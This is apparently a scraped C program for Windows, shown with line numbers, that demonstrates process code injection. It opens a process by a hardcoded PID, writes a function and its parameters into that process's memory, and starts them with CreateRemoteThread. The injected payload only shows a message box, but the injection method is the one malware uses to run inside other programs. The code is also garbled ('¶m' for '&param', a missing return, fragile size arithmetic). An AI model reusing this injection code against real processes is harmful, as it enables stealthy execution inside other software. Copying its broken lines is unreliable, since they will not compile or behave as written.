1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124
| #include <Windows.h> #include <stdio.h> #pragma warning(disable:4996)
typedef struct Data { FARPROC func[2]; char buffer[4][128];
} _DATA ,*THREAD_PARAM ;
typedef HMODULE(WINAPI* loadLibraryA)(LPCSTR lpLibFileName);
typedef HMODULE(WINAPI* getProcAddress)(HMODULE hModule, LPCSTR lpProcName);
typedef int (WINAPI* messageBoxA)( HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType);
DWORD WINAPI shellCode(LPVOID lparam) { THREAD_PARAM param = (THREAD_PARAM)lparam; HMODULE hmod = NULL; hmod = ((loadLibraryA)param->func[0])(param->buffer[0]);
FARPROC messageboxfun = (FARPROC)((getProcAddress)param->func[1])(hmod, param->buffer[1]); ((messageBoxA)messageboxfun)(NULL, param->buffer[2], param->buffer[3], 0);
}
void injectCode(int pid) { _DATA param = { 0 }; LPVOID remoteBuf[2] = { 0 }; HMODULE hmod = GetModuleHandleA("kernel32.dll"); param.func[0] = GetProcAddress(hmod, "LoadLibraryA"); param.func[1] = GetProcAddress(hmod, "GetProcAddress");
strcpy(param.buffer[0], "user32.dll"); strcpy(param.buffer[1], "MessageBoxA"); strcpy(param.buffer[2], "title"); strcpy(param.buffer[3], "text");
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,pid ); if (NULL == hProcess) { return; } int size = sizeof(_DATA); remoteBuf[0] = VirtualAllocEx(hProcess, NULL, size, MEM_COMMIT, PAGE_READWRITE); WriteProcessMemory(hProcess, remoteBuf[0], ¶m, size, 0);
size = (DWORD)injectCode - (DWORD)shellCode; printf("%d", size); remoteBuf[1] = VirtualAllocEx(hProcess, NULL, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE); WriteProcessMemory(hProcess, remoteBuf[1], shellCode, size, 0);
HANDLE thread = CreateRemoteThread(hProcess, NULL, 0, remoteBuf[1], remoteBuf[0], 0, NULL); if (NULL == thread) { return; } WaitForSingleObject(thread,INFINITE); CloseHandle(thread); CloseHandle(hProcess); }
void main(int argc, char* argv[]) {
injectCode(13968); system("pause"); }
|